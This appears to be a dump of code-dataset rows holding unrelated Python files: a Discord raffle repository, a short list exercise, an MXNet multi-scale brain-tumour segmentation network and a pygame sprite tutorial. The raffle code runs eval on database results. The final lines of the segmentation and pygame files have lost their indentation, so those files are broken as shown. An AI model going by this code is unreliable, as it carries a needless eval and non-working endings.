                        # decrement the user's currency
                        self._commonRepository.subtract_from_user_currency(rDiscordUserID, rSeedAmount)
                        return '', StatusCodes.OK
                    else:
                        # conflict when inserting, so a raffle with this name already exists
                        return f"A raffle with the name {rName} already exists on this server", StatusCodes.CONFLICT
                # the user does not have enough currency to start this raffle
                return 'Insufficient funds', StatusCodes.IM_A_TEAPOT
        except Exception:
            # was a bare `except:` which also swallowed SystemExit/KeyboardInterrupt
            return '', StatusCodes.INTERNAL_SERVER_ERROR

    # adds currency to a raffle
    def join_raffle(self, rDiscordUserID, rServerID, rRaffle, rAmount):
        """Enter a user into a raffle, moving rAmount from the user to the pot.

        :return: (raffle info dict, OK); (msg, NOT_FOUND) if the raffle does
            not exist; ('Insufficient funds', IM_A_TEAPOT); or
            ('', INTERNAL_SERVER_ERROR) on failure.
        """
        try:
            userCurrenyQuery = self.db.select(['Currency'], 'discordusers',
                'DiscordUserID = %s', [rDiscordUserID]).getRows()
            if len(userCurrenyQuery) > 0:
                userCurrency = userCurrenyQuery[0]['Currency']
                # make sure the user has enough currency to join this raffle
                if userCurrency >= rAmount:
                    # if a raffle exists on this server with the same name
                    raffleQueryDataTable = self.db.select(['RaffleID', 'Currency'], 'raffles',
                        'Name = %s AND ServerID = %s', [rRaffle, rServerID]).getRows()
                    if len(raffleQueryDataTable) == 1:
                        # get the RaffleID
                        raffleID = raffleQueryDataTable[0]['RaffleID']
                        # record the entry in DiscordUserRaffles
                        self.db.insertOne('discorduserraffles', ['DiscordUserID', 'RaffleID', 'JoinDate'], {
                            'DiscordUserID': rDiscordUserID,
                            'RaffleID': raffleID,
                            'JoinDate': str(datetime.datetime.now())
                        })
                        # update the Raffles table
                        self._commonRepository.add_currency_to_raffle(raffleID, rAmount)
                        # decrement the user's currency
                        self._commonRepository.subtract_from_user_currency(rDiscordUserID, rAmount)
                        # query the DB for the return statement
                        raffle = eval(str(self.db.select(['*'], 'raffles', 'RaffleID = %s', [raffleID]).getRows()[0]))
                        discordusers = self.__get_discordusers_in_raffle(raffleID)
                        return {
                            'DiscordUsers': discordusers,
                            'Raffle': raffle
                        }, StatusCodes.OK
                    else:
                        # raffle with the passed name was not found on the server
                        return f"A raffle with the name {rRaffle} was not found on this server",\
                            StatusCodes.NOT_FOUND
                # the user does not have enough currency to join this raffle
                return 'Insufficient funds', StatusCodes.IM_A_TEAPOT
        except Exception:
            return '', StatusCodes.INTERNAL_SERVER_ERROR

    # returns all of the raffles that are currently available on the specified server
    def get_raffles(self, rServerID):
        """Return [(raffle row + entrants)] for every raffle on a server."""
        try:
            raffles = self.db.select(['*'], 'raffles', 'ServerID = %s', [rServerID]).getRows()
            # return list of raffleinfos
            return [{
                'DiscordUsers': self.__get_discordusers_in_raffle(raffle['RaffleID']),
                'Raffle': eval(str(raffle))
            } for raffle in raffles], StatusCodes.OK
        except Exception:
            return '', StatusCodes.INTERNAL_SERVER_ERROR

    # returns all of the raffles (live or archived) the user has joined
    def get_historic_raffles(self, rDiscordUserID):
        """Return the user's joined raffles, merging live rows with history rows."""
        try:
            # Each column prefers the archived (rafflehistory) value and falls
            # back to the live (raffles) value for raffles still running.
            result = self.db.select(['discorduserraffles.RaffleID',
                'CASE WHEN rafflehistory.DiscordUserID IS NOT NULL THEN rafflehistory.DiscordUserID ELSE raffles.DiscordUserID END AS DiscordUserID',
                'CASE WHEN rafflehistory.ServerID IS NOT NULL THEN rafflehistory.ServerID ELSE raffles.ServerID END AS ServerID',
                'CASE WHEN rafflehistory.Name IS NOT NULL THEN rafflehistory.Name ELSE raffles.Name END AS Name',
                'CASE WHEN rafflehistory.EndTime IS NOT NULL THEN rafflehistory.EndTime ELSE raffles.EndTime END AS EndTime',
                'CASE WHEN rafflehistory.Currency IS NOT NULL THEN rafflehistory.Currency ELSE raffles.Currency END AS Currency',
                'rafflehistory.WinnerDiscordUserID'], '''
                discorduserraffles
                LEFT JOIN rafflehistory ON discorduserraffles.RaffleID = rafflehistory.RaffleID
                LEFT JOIN raffles ON discorduserraffles.RaffleID = raffles.RaffleID''',
                'discorduserraffles.DiscordUserID = %s AND (raffles.DiscordUserID IS NOT NULL OR rafflehistory.DiscordUserID IS NOT NULL)', [rDiscordUserID])
            # return list of raffleinfos
            return eval(str(result)), StatusCodes.OK
        except Exception:
            return '', StatusCodes.INTERNAL_SERVER_ERROR

    # returns all of the raffles that are going to end within the given number of milliseconds
    def get_raffles_ending_in_millis(self, rMillis):
        """Return raffles whose EndTime falls within the next rMillis milliseconds."""
        try:
            # calculate the cutoff time
            nowtime = datetime.datetime.now().timestamp()
            endTime = str(datetime.datetime.fromtimestamp(int(nowtime + (rMillis / 1000))))
            raffles = self.db.select(['*'], 'raffles', 'EndTime < %s', [endTime])
            # return list of raffles
            return eval(str(raffles)), StatusCodes.OK
        except Exception:
            return '', StatusCodes.INTERNAL_SERVER_ERROR

    # ends the specified raffle if the user who
    # requested this is qualified to end the raffle
    def end_raffle(self, rDiscordUserID, rServerID, rRaffle):
        """Close a raffle: pick a random entrant, pay the pot, archive, delete.

        Only the raffle creator or the bot (DiscordUserID '0') may end a
        raffle. :return: (winner + raffle info, OK); (msg, FORBIDDEN);
        (msg, NOT_FOUND); or (exception, INTERNAL_SERVER_ERROR).
        """
        try:
            raffle = self.db.select(['*'], 'raffles',
                'ServerID = %s AND Name = %s', [rServerID, rRaffle]).getRows()
            if len(raffle) == 1:
                # only the bot ('0') or the user who started the raffle may end it
                if rDiscordUserID in ['0', raffle[0]['DiscordUserID']]:
                    discordusersinraffle = self.__get_discordusers_in_raffle(raffle[0]['RaffleID'])
                    # each join is one entry, so joining repeatedly raises the odds
                    winner = random.choice(discordusersinraffle)
                    # add the total currency for this raffle to the winner's currency
                    self._commonRepository.add_to_user_currency(winner['DiscordUserID'], raffle[0]['Currency'])
                    nowtime = datetime.datetime.now().timestamp()
                    endTime = datetime.datetime.fromtimestamp(int(nowtime))
                    # archive the raffle before removing it from the live table
                    self.db.insertOne('rafflehistory', ['RaffleID', 'ServerID', 'Name', 'EndTime', 'Currency', 'DiscordUserID', 'WinnerDiscordUserID'], {
                        'RaffleID': raffle[0]['RaffleID'],
                        'ServerID': raffle[0]['ServerID'],
                        'Name': raffle[0]['Name'],
                        'EndTime': str(endTime),
                        'Currency': raffle[0]['Currency'],
                        'DiscordUserID': raffle[0]['DiscordUserID'],
                        'WinnerDiscordUserID': winner['DiscordUserID']
                    })
                    # delete the raffle
                    self.db.delete('raffles', 'RaffleID = %s', [raffle[0]['RaffleID']])
                    return {
                        'Winner': winner,
                        'RaffleInfo': {
                            'DiscordUsers': discordusersinraffle,
                            'Raffle': eval(str(raffle[0]))
                        }
                    }, StatusCodes.OK
                else:
                    # only the user who started the raffle or the bot can end a raffle
                    return 'You do not have the authority to end this raffle',\
                        StatusCodes.FORBIDDEN
            else:
                # raffle with the passed name was not found on the server
                return f"A raffle with the name {rRaffle} was not found on this server",\
                    StatusCodes.NOT_FOUND
        except Exception as e:
            # some error has occurred
            return e, StatusCodes.INTERNAL_SERVER_ERROR
| true |
2c048c8bfb008583f3c5defe19350ec65dc6eeef | Python | amritat123/list_Questions | /add_withthird_element.py | UTF-8 | 123 | 3.53125 | 4 | [] | no_license | #addition with first element to third element..
a=[15,7,9,8,2,6]
i=0
j=1
while i<len(a)-2:
print(a[i]+a[j]+2)
i+=1
j+=1 | true |
bc7093513abd8b955ebaa12c6118274e86d00cf2 | Python | lachinov/brats2018-graphlabunn | /scripts/segmentation_model.py | UTF-8 | 11,803 | 2.84375 | 3 | [
"Apache-2.0"
] | permissive | import mxnet as mx
import config
import utils
def dice_loss(softmax, label, smooth=1.0, name='', include_bg=False):
    """
    mean Dice loss function
    :param softmax: input softmax tensor with shape (N,C,D,H,W)
    :param label: input label tensor with shape (N,C,D,H,W)
    :param smooth: smoothing constant for Laplace smoothing
    :param name: network name
    :param include_bg: whether to include background in loss computation or not
    :return: MakeLoss symbol computing 1 - mean(smoothed Dice coefficient)
    """
    # Per-(sample, class) reductions over the spatial axes (D,H,W).
    # NOTE(review): predictions are squared in the denominator while labels
    # are not (Milletari-style Dice) — confirm the asymmetry is intended.
    pred_size = mx.sym.square(softmax).sum(axis=[2, 3, 4])
    label_size = label.sum(axis=[2, 3, 4])
    intersection_size = (softmax * label).sum(axis=[2, 3, 4])
    error = (2.0 * intersection_size+smooth) / (pred_size + label_size + smooth)
    if not include_bg:
        # Drop class 0 (background) before averaging.
        error = mx.sym.slice_axis(error, axis=1, begin=1, end=None)
    error = error.mean()
    return mx.symbol.MakeLoss(1.0 - error, name=name+'smooth_dice')
def conv(data, kernel, pad, stride, num_filter, net_name, name, num_group):
    """
    convolution wrapper
    :param data: input tensor with shape (N,C,D,H,W)
    :param kernel: shape of the convolving kernel (X,Y,Z)
    :param pad: padding (X,Y,Z)
    :param stride: convolution stride (X,Y,Z)
    :param num_filter: number of filters
    :param net_name: name of the network
    :param name: name of the filter
    :param num_group: number of convolutional groups
    """
    return mx.sym.Convolution(
        data=data,
        kernel=kernel,
        pad=pad,
        stride=stride,
        num_filter=num_filter,
        num_group=num_group,
        name=net_name + name + 'sep_conv',
    )
def activation(data, type, name):
    """
    activation function wrapper
    :param data: input tensor with shape (N,C,D,H,W)
    :param type: one of ['relu','lrelu','prelu','elu','softplus']
    :param name: activation layer name
    :return: the requested activation symbol
    """
    assert(type in ['relu','lrelu','prelu','elu','softplus'])
    # Build only the requested symbol; the original always constructed a
    # ReLU first and then discarded it for every non-relu type.
    if type == 'lrelu':
        return mx.sym.LeakyReLU(data=data, act_type='leaky', slope=config.slope, name=name)
    if type == 'prelu':
        return mx.sym.LeakyReLU(data=data, act_type='prelu', slope=config.slope, name=name)
    if type == 'elu':
        return mx.sym.LeakyReLU(data=data, act_type='elu', slope=config.slope, name=name)
    if type == 'softplus':
        return mx.sym.Activation(data=data, act_type='softrelu', name=name)
    return mx.sym.Activation(data=data, act_type='relu', name=name)
def res_net_pre_activation(data, num_filter, net_name, name, normalize=True, num_group=1):
    """
    pre-activation residual block
    :param data: input tensor with shape (N,C,D,H,W)
    :param num_filter: number of filters
    :param net_name: name of the network
    :param name: name of the residiual block
    :param normalize: normalize feature maps or not
    :param num_group: number of groups in convolutions
    """
    # Pre-activation ordering: (norm ->) act -> 3x3x3 conv, twice, then an
    # identity shortcut add (shapes must match, so num_filter should equal
    # data's channel count).
    norm_data = data
    if normalize:
        norm_data = mx.sym.InstanceNorm(data, name = net_name+name+'norm1')
    relu1 = activation(data=norm_data, type=config.activation, name=name + 'relu1')
    conv1 = conv(data=relu1, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(1, 1, 1), num_filter=num_filter, num_group=num_group, net_name=net_name, name=name + 'conv1')
    if normalize:
        conv1 = mx.sym.InstanceNorm(conv1, name = net_name+name+'norm2')
    relu2 = activation(data=conv1, type=config.activation, name=name + 'relu2')
    conv2 = conv(data=relu2, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(1, 1, 1), num_filter=num_filter, num_group=num_group, net_name = net_name, name=name + 'conv2')
    s = mx.sym.elemwise_add(data,conv2,name=name+'sum')
    return s
def transform_encoders_feature_map(feature_maps):
    """
    transformation of multiple encoders outputs
    :param feature_maps: concatenated encoders' feature maps
    :return joint feature map (element-wise max across the encoder groups)
    """
    per_encoder = mx.sym.split(feature_maps, axis=1, num_outputs=config.encoder_groups)
    stacked = mx.sym.stack(*per_encoder, axis=5)
    return mx.sym.max_axis(stacked, axis=5)
def get_unet_symbol(data, features_number, outputs_number, net_name, stack_conn_0, stack_conn_1, stack_conn_2, return_feature_map = False):
    """
    get base network symbol
    :param data: input tensor with shape (N,C,D,H,W)
    :param features_number: base number of filters (features)
    :param outputs_number: number of output classes
    :param net_name: name of the network
    :param stack_conn_0, stack_conn_1, stack_conn_2: connections with cascaded networks (None or corresponding symbol)
    :param return_feature_map: return softmax or softmax with feature maps from deeper layers of network
    :return symbol
    """
    # ---- encoder: residual blocks with three strided-conv downsamplings ----
    conv1 = conv(data=data, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(1, 1, 1), num_filter=features_number * 2 * config.encoder_channel_multiplier,
                 num_group=config.encoder_groups, net_name=net_name, name='conv1')
    rb1 = res_net_pre_activation(conv1, features_number * 2 * config.encoder_channel_multiplier, net_name, 'rb1', True, config.encoder_groups)
    pool1 = mx.sym.Convolution(data=rb1, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(2,2,2), num_filter=features_number * 4 * config.encoder_channel_multiplier,
                               num_group=config.encoder_groups , name=net_name + 'pool1')
    block_0 = mx.sym.Dropout(pool1, p=0.1, name=net_name + 'do1')
    rb2 = res_net_pre_activation(block_0, features_number * 4 * config.encoder_channel_multiplier, net_name, 'rb2', True, config.encoder_groups)
    pool2 = mx.sym.Convolution(data=rb2, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(2,2,2), num_filter=features_number * 8 * config.encoder_channel_multiplier,
                               num_group=config.encoder_groups, name=net_name + 'pool2')
    block_1 = mx.sym.Dropout(pool2, p=0.1, name=net_name + 'do2')
    rb3 = res_net_pre_activation(block_1, features_number * 8 * config.encoder_channel_multiplier, net_name, 'rb3', True, config.encoder_groups)
    pool3 = mx.sym.Convolution(data=rb3, kernel=(3, 3, 3), pad=(1, 1, 1), stride=(2,2,2), num_filter=features_number * 16 * config.encoder_channel_multiplier,
                               num_group=config.encoder_groups, name=net_name + 'pool3')
    block_2 = mx.sym.Dropout(pool3, p=0.1, name=net_name + 'do3')
    rb4 = res_net_pre_activation(block_2, features_number * 16 * config.encoder_channel_multiplier, net_name, 'rb4', True, config.encoder_groups)
    # ---- decoder: deconv upsampling with skip connections; each skip is
    # max-merged across encoder groups, optionally concatenated with the
    # cascaded network's output, then squeezed by a 1x1x1 convolution ----
    rb4 = transform_encoders_feature_map(rb4)
    up_conv4_1 = mx.sym.Deconvolution(rb4, kernel=(2, 2, 2), pad=(0, 0, 0), stride=(2, 2, 2),
                                      num_filter=features_number * 8, name=net_name + 'up_conv4_1')
    rb3 = transform_encoders_feature_map(rb3)
    connection0 = mx.symbol.concat(up_conv4_1, rb3, dim=1)
    if stack_conn_0 is not None:
        connection0 = mx.symbol.concat(up_conv4_1, rb3, stack_conn_0, dim=1, name=net_name+'sconc0')
    connection0 = mx.sym.Convolution(data=connection0, kernel=(1, 1, 1), pad=(0, 0, 0), num_filter=features_number * 8)
    rb5 = res_net_pre_activation(connection0, features_number * 8, net_name, 'rb5', True)
    up_conv3_1 = mx.sym.Deconvolution(rb5, kernel=(2, 2, 2), pad=(0, 0, 0), stride=(2, 2, 2),
                                      num_filter=features_number * 4, name=net_name + 'up_conv3_1')
    rb2 = transform_encoders_feature_map(rb2)
    connection1 = mx.symbol.concat(up_conv3_1, rb2, dim=1)
    if stack_conn_1 is not None:
        connection1 = mx.symbol.concat(up_conv3_1, rb2, stack_conn_1, dim=1, name=net_name+'sconc1')
    connection1 = mx.sym.Convolution(data=connection1, kernel=(1, 1, 1), pad=(0, 0, 0), num_filter=features_number * 4)
    rb6 = res_net_pre_activation(connection1, features_number * 4, net_name, 'rb6', True)
    up_conv2_1 = mx.sym.Deconvolution(rb6, kernel=(2, 2, 2), pad=(0, 0, 0), stride=(2, 2, 2),
                                      num_filter=features_number * 2, name=net_name + 'up_conv2_1')
    rb1 = transform_encoders_feature_map(rb1)
    connection2 = mx.symbol.concat(up_conv2_1, rb1, dim=1)
    if stack_conn_2 is not None:
        # gradients are blocked through the finest cascaded connection
        connection2 = mx.symbol.concat(up_conv2_1, rb1, mx.sym.BlockGrad(stack_conn_2), dim=1, name=net_name+'sconc2')
    connection2 = mx.sym.Convolution(data=connection2, kernel=(1, 1, 1), pad=(0, 0, 0), num_filter=features_number * 2)
    rb7 = res_net_pre_activation(connection2, features_number * 2, net_name, 'rb7', True)
    fconv3 = mx.sym.Convolution(data=rb7, kernel=(1, 1, 1), pad=(0, 0, 0), num_filter=outputs_number)
    #if stack_conn_2 is not None:
    #    fconv3 = mx.symbol.elemwise_add(fconv3, stack_conn_2, dim=1, name=net_name+'fconn')
    if return_feature_map:
        return fconv3, rb7
    return fconv3
def softmax(net, label):
    """
    apply softmax and loss to the inputs
    :param net: network output tensor with shape (N,C,D,H,W)
    :param label: ground truth tensor with shape (N,C,D,H,W)
    :return symbol, loss
    """
    probs = mx.sym.softmax(data=net, name='softmax_lbl', axis=1)
    return probs, dice_loss(probs, label, 1.0, 'seg')
def get_segmentation_model(data, label, filters_number=config.seg_filters_number, n_outputs = config.seg_output_features, name_prefix = '', training=True):
    """
    get segmentation model symbol and corresponding loss
    :param data: input tensor with shape (N,C,D,H,W)
    :param label: ground truth tensor with shape (N,C,D,H,W)
    :param filters_number: base number of filters
    :param n_outputs: number of output classes
    :param name_prefix: model prefix
    :param training: when False, (softmax, None) is returned without a loss
    :return symbol, loss
    """
    # Multi-scale cascade: average-pool data and label to 1/2, 1/4 and 1/8
    # resolution and run a U-Net at each scale, feeding each coarser softmax
    # into the next finer network's decoder.
    data128 = data
    data64 = mx.sym.Pooling(data=data128, pool_type="avg", kernel=(2,2,2), stride=(2,2,2))
    data32 = mx.sym.Pooling(data=data128, pool_type="avg", kernel=(4,4,4), stride=(4,4,4))
    data16 = mx.sym.Pooling(data=data128, pool_type="avg", kernel=(8,8,8), stride=(8,8,8))
    label128 = label
    label64 = mx.sym.Pooling(data=label128, pool_type="avg", kernel=(2,2,2), stride=(2,2,2))
    label32 = mx.sym.Pooling(data=label128, pool_type="avg", kernel=(4,4,4), stride=(4,4,4))
    label16 = mx.sym.Pooling(data=label128, pool_type="avg", kernel=(8,8,8), stride=(8,8,8))
    #net16, fm16 = get_unet_symbol(data = data16, features_number=filters_number * 8, outputs_number=n_outputs, net_name=name_prefix + 'net16',
    #                              stack_conn_0=None, stack_conn_1=None, stack_conn_2=None, return_feature_map=True, training=True)
    #net16_sm, loss_dice16 = softmax(net16, label16)
    net32, fm32 = get_unet_symbol(data=data32, features_number=filters_number * 4, outputs_number=n_outputs,
                                  net_name=name_prefix + 'net32',
                                  stack_conn_0=None, stack_conn_1=None, stack_conn_2=None, return_feature_map=True)
    net32_sm, loss_dice32 = softmax(net32, label32)
    net64, fm64 = get_unet_symbol(data=data64, features_number=filters_number * 2, outputs_number=n_outputs,
                                  net_name=name_prefix + 'net64',
                                  stack_conn_0=None, stack_conn_1=net32_sm, stack_conn_2=None, return_feature_map=True)
    net64_sm, loss_dice64 = softmax(net64, label64)
    net128 = get_unet_symbol(data=data, features_number=filters_number, outputs_number=n_outputs,
                             net_name=name_prefix + 'net128',
                             stack_conn_0=net32_sm, stack_conn_1=net64_sm, stack_conn_2=None, return_feature_map=False)
    net128_sm, loss_dice128 = softmax(net128, label128)
    # Weighted deep-supervision loss: finer scales weigh more.
    loss = 0.4*loss_dice128+0.3*loss_dice64+0.2*loss_dice32#+0.1*loss_dice16
    if not training:
        return mx.sym.BlockGrad(net128_sm), None
return mx.sym.BlockGrad(net128_sm), loss | true |
3c04f4fa7eccefddd59c7b4ab3f37479647a147f | Python | DocIncognito/gameDesign_up | /0. Dr. Marc's Pygame Tutorial/tutorial.py | UTF-8 | 5,758 | 3.34375 | 3 | [] | no_license | import pygame, sys
class Map(object):
    """Tile map loaded from map.txt ('l' = land, 'w' = water), 64x64 tiles."""

    def __init__(self):
        """initializes the map"""
        # Bug fix: open(...).readlines() leaked the file handle; use a
        # context manager so it is closed deterministically.
        with open("map.txt") as map_file:
            self.data = [line.rstrip() for line in map_file]
        self.water = pygame.image.load("gfx/water.png").convert()
        self.land = pygame.image.load("gfx/land.png").convert()

    def draw(self, screen):
        """draws the map: one 64x64 tile per character of the layout"""
        for i, row in enumerate(self.data):
            for j, column in enumerate(row):
                if column == "l":
                    #draw the land tile
                    screen.blit(self.land, pygame.Rect(j*64, i*64, 64, 64))
                elif column == "w":
                    screen.blit(self.water, pygame.Rect(j*64, i*64, 64, 64))
class Ball(object):
"""this is the enemy ball thing"""
def __init__(self):
super(Ball, self).__init__()
self.img = pygame.image.load("gfx/ball.png").convert_alpha()
self.rect = self.img.get_rect()
self.rect.x = 10
self.rect.y = 10
self.vel_x = 3
self.vel_y = 3
self.score = 0
def update(self, screen_rect):
"""updates ball's position"""
future_rect = self.rect.move(self.vel_x, self.vel_y)
if future_rect.left < screen_rect.left or future_rect.right > screen_rect.right:
self.vel_x = -self.vel_x
self.score += 1
if future_rect.top < screen_rect.top or future_rect.bottom > screen_rect.bottom:
self.vel_y = -self.vel_y
self.score += 1
self.rect.move_ip(self.vel_x, self.vel_y)
def draw(self, screen):
"""draws ball to screen"""
screen.blit(self.img, self.rect)
class Player(object):
    """cute fat little bear: 64x143 sprite, 4 animation frames per direction"""
    def __init__(self):
        self.image = pygame.image.load("gfx/bear.png").convert_alpha()
        self.rect = self.image.get_rect()
        self.rect.width = 64
        self.rect.height = 143
        self.rect.x = 25
        self.rect.y = 25
        self.xvel = 6
        self.yvel = 6
        self.direction = 0  # 0 == right, 1 == left
        self.moving = [False, False, False, False]  # up, down, left, right
        self.frame = 0  # animation counter, advanced once per update

    def update(self, score):
        """Move the bear by its movement flags, clamped to the 640x448 screen.

        Each clamp against a screen edge increments and returns *score*.
        Opposite directions held at once cancel out (no movement at all).
        """
        if self.moving[0] and self.moving[1]:
            return score
        elif self.moving[2] and self.moving[3]:
            return score
        if self.moving[0]:
            future = self.rect.move(0, -self.yvel)
            if future.top < 0:
                self.rect.top = 0
                score += 1
            else:
                self.rect = future
        elif self.moving[1]:
            future = self.rect.move(0, self.yvel)
            if future.bottom > 448:
                self.rect.bottom = 448
                score += 1
            else:
                self.rect = future
        if self.moving[2]:
            self.direction = 1
            future = self.rect.move(-self.xvel, 0)
            if future.left < 0:
                self.rect.left = 0
                score += 1
            else:
                self.rect = future
        elif self.moving[3]:
            self.direction = 0
            future = self.rect.move(self.xvel, 0)
            if future.right > 640:
                self.rect.right = 640
                score += 1
            else:
                self.rect = future
        # Animate only while moving; 20 ticks cover the 4-frame strip.
        if self.moving == [False, False, False, False]:
            self.frame = 0
        else:
            self.frame += 1
            if self.frame > 19:
                self.frame = 0
        return score

    def draw(self, screen):
        """draws the bear from the sprite strip (row = direction)"""
        # Bug fix for Python 3: frame/5 is float division, making the source
        # Rect x-offset a non-multiple of 64; floor-divide to pick the frame.
        screen.blit(self.image, self.rect, pygame.Rect(64*(self.frame//5), self.direction*143, 64, 143))
class Game(object):
    """Top-level game object: window setup, input handling, update and draw."""
    def __init__(self):
        """initializes the game"""
        pygame.init()
        self.screen = pygame.display.set_mode((640, 448))
        self.clock = pygame.time.Clock()
        self.map = Map()
        self.player = Player()
        self.ball = Ball()
        self.f32 = pygame.font.Font(None, 32)
        self.score = 0
    def process_events(self):
        """Handle input: ESC exits; arrow key down/up toggles movement flags."""
        for event in pygame.event.get():
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_ESCAPE:
                    sys.exit()
                if event.key == pygame.K_UP:
                    self.player.moving[0] = True
                if event.key == pygame.K_DOWN:
                    self.player.moving[1] = True
                if event.key == pygame.K_LEFT:
                    self.player.moving[2] = True
                if event.key == pygame.K_RIGHT:
                    self.player.moving[3] = True
            if event.type == pygame.KEYUP:
                if event.key == pygame.K_UP:
                    self.player.moving[0] = False
                if event.key == pygame.K_DOWN:
                    self.player.moving[1] = False
                if event.key == pygame.K_LEFT:
                    self.player.moving[2] = False
                if event.key == pygame.K_RIGHT:
                    self.player.moving[3] = False
    def update(self):
        """Advance player (accumulating score) and ball by one frame."""
        self.score = self.player.update(self.score)
        self.ball.update(self.screen.get_rect())
    def draw(self):
        """Draw map, ball, player and the score readout centered near the top."""
        self.map.draw(self.screen)
        self.ball.draw(self.screen)
        self.player.draw(self.screen)
        scoresurf = self.f32.render("Score = %d"%self.score, 1, (0,0,0))
        scorerect = scoresurf.get_rect()
        scorerect.center = (320, 30)
        self.screen.blit(scoresurf, scorerect)
self.screen.blit(scoresurf, scorerect)
# Main loop: cap at 30 FPS, then input -> update -> render each frame.
g = Game()
while True:
    g.clock.tick(30)
    g.process_events()
    g.update()
    g.draw()
pygame.display.flip() | true |